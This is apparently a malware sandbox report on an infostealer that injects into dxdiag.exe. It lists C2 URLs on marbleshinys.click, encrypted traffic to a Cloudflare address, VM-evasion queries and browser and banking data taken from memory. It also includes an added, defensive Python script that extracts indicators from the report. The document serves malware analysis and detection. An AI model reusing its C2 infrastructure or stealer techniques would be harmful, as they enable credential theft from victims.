Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609907561.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523098784.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/
Source: dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/((
Source: dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/3w
Source: dxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/7Q
Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/;v
Source: dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/Kv
Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/Sv=
Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1553804430.00000000054B9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1610114752.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603770541.000000000304E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609907561.000000000301F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/api
Source: dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/api8s
Source: dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/apiJr
Source: dxdiag.exe, 00000002.00000003.1638321610.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643222941.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/apiP
Source: dxdiag.exe, 00000002.00000003.1565623403.000000000304E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/apiQ
Source: dxdiag.exe, 00000002.00000002.1643999732.000000000304E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/apiv
Source: dxdiag.exe, 00000002.00000003.1554662253.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1552892573.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1552078829.00000000054C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/jgES
Source: dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/kw5
Source: dxdiag.exe, 00000002.00000003.1638835789.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/pi
Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609383602.0000000005423000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1645464639.0000000005427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click:443/api
Source: dxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click:443/apiLSID
Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64270
                Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 64243 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 64270 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64243
                Source: unknown | Network traffic detected: HTTP traffic on port 64254 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64254
                Source: unknown | Network traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49756 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49837 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49845 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49858 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49869 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64243 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64254 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64270 version: TLS 1.2
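The URL and TLS rows above, turned into indicators, as an added example that is not part of the Joe Sandbox report or Joe Security's tooling: a parser for report rows of this shape that separates the C2 hosts from strings the stealer merely read out of the victim's browser profile (reversed host names such as gro.allizom.www. are the rev_host column of Firefox's places.sqlite, so those rows come from the harvested profile, not from the malware), records which process's memory held each host, and checks the TLS server address against Cloudflare's published IPv4 prefixes. Every session in the report goes to 172.67.148.118, a Cloudflare edge, so the name is the thing to block, not the IP. The sample rows are copied from this report, including two of the bare domains the report lists in the parent process's memory; the noise suffix list and the parsing rules are my assumptions.

```python
"""Network IOC extraction over Joe Sandbox 'Source:' rows.

Added example; not part of the sandbox report or Joe Security's tooling.
REPORT_LINES is a constructed subset copied from this report, laid out as
"Source: <process, memory region> | <finding>". The noise suffix list and
the parsing rules are my assumptions; the CDN ranges are Cloudflare's
published IPv4 prefixes.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

REPORT_LINES = """\
Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click:443/api
Source: dxdiag.exe, 00000002.00000002.1643999732.000000000304E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://marbleshinys.click/apiv
Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64270 version: TLS 1.2
Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bashfulacid.lat
Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: marbleshinys.click
"""

# Assumption: hosts that only show up because the stealer read the victim's
# browser profile (bookmarks, search defaults), not because the malware uses them.
NOISE_SUFFIXES = ("mozilla.org", "google.com", "amazon.com", "ecosia.org", "invisalign.com")

# Cloudflare's published IPv4 prefixes (anycast edges; blocking one is pointless).
CLOUDFLARE_V4 = [ipaddress.ip_network(p) for p in (
    "104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13", "162.158.0.0/15",
    "173.245.48.0/20", "188.114.96.0/20", "190.93.240.0/20", "197.234.240.0/22",
    "198.41.128.0/17", "141.101.64.0/18", "108.162.192.0/18", "131.0.72.0/22",
)]

SOURCE_RE = re.compile(r"^Source:\s*([^,|]+?)\s*(?:,|\|)")
URL_RE = re.compile(r"String found in binary or memory:\s*(https?://\S+)")
DOMAIN_RE = re.compile(r"String found in binary or memory:\s*([a-z0-9-]+(?:\.[a-z0-9-]+)+)\s*$", re.I)
TLS_RE = re.compile(
    r"HTTPS traffic detected:\s*(\d+(?:\.\d+){3}):(\d+) -> (\d+(?:\.\d+){3}):(\d+) version: (TLS [\d.]+)")


def is_noise(host):
    return any(host == s or host.endswith("." + s) for s in NOISE_SUFFIXES)


def is_cdn_fronted(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def extract_iocs(text):
    hosts = defaultdict(set)   # C2 host -> processes whose memory held it
    urls, noise, sessions = set(), set(), []
    for line in text.splitlines():
        src = SOURCE_RE.search(line)
        proc = src.group(1) if src else "unknown"
        if (m := URL_RE.search(line)):
            parts = urlsplit(m.group(1))
            host = (parts.hostname or "").lower()
            if is_noise(host):
                noise.add(host)
            else:
                hosts[host].add(proc)
                # Drop an explicit :443 so "host:443/api" and "host/api" collapse.
                urls.add(f"{parts.scheme}://{host}{parts.path}")
        elif (m := DOMAIN_RE.search(line)):
            host = m.group(1).lower()
            if is_noise(host):
                noise.add(host)
            else:
                hosts[host].add(proc)
        elif (m := TLS_RE.search(line)):
            sessions.append({"server": m.group(1), "server_port": int(m.group(2)),
                             "client_port": int(m.group(4)), "version": m.group(5),
                             "cdn_fronted": is_cdn_fronted(m.group(1))})
    return {"c2_hosts": {h: sorted(p) for h, p in hosts.items()},
            "c2_urls": sorted(urls), "noise_hosts": sorted(noise),
            "tls_sessions": sessions}


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_LINES)
    for host, procs in iocs["c2_hosts"].items():
        print(f"block {host:24s} seen in {', '.join(procs)}")
    for s in iocs["tls_sessions"]:
        note = "CDN edge, block the name not the IP" if s["cdn_fronted"] else "direct"
        print(f"{s['server']}:{s['server_port']} {s['version']} ({note})")
```

The per-process attribution is the useful part: the same C2 name appears in the parent PI1EA8P74K.exe (where the configuration is decrypted) and in the injected dxdiag.exe (where it is used), which is what you would expect if the parent only unpacks and the hollowed host does the stealing.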
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
                Source: PI1EA8P74K.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: dxdiag.exe, 00000002.00000003.1526667120.0000000005436000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526365084.0000000005454000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PI1EA8P74K.exe | ReversingLabs: Detection: 86%
                Source: unknown | Process created: C:\Users\user\Desktop\PI1EA8P74K.exe "C:\Users\user\Desktop\PI1EA8P74K.exe"
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: webio.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
                Source: PI1EA8P74K.exe | Static PE information: Image base 0x140000000 > 0x60000000
                Source: PI1EA8P74K.exe | Static file information: File size 12940800 > 1048576
                Source: PI1EA8P74K.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa59400
                Source: PI1EA8P74K.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x144000
                Source: PI1EA8P74K.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: PI1EA8P74K.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PI1EA8P74K.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PI1EA8P74K.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PI1EA8P74K.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PI1EA8P74K.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: PI1EA8P74K.exe | Static PE information: section name: .fptable
                Source: PI1EA8P74K.exe | Static PE information: section name: _RDATA
                Source: C:\Windows\SysWOW64\dxdiag.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\dxdiag.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\SysWOW64\dxdiag.exe | System information queried: FirmwareTableInformation
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 8028 | Thread sleep time: -180000s >= -30000s
                Source: C:\Windows\SysWOW64\dxdiag.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696503903o
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696503903x
                Source: dxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643171569.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW*
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
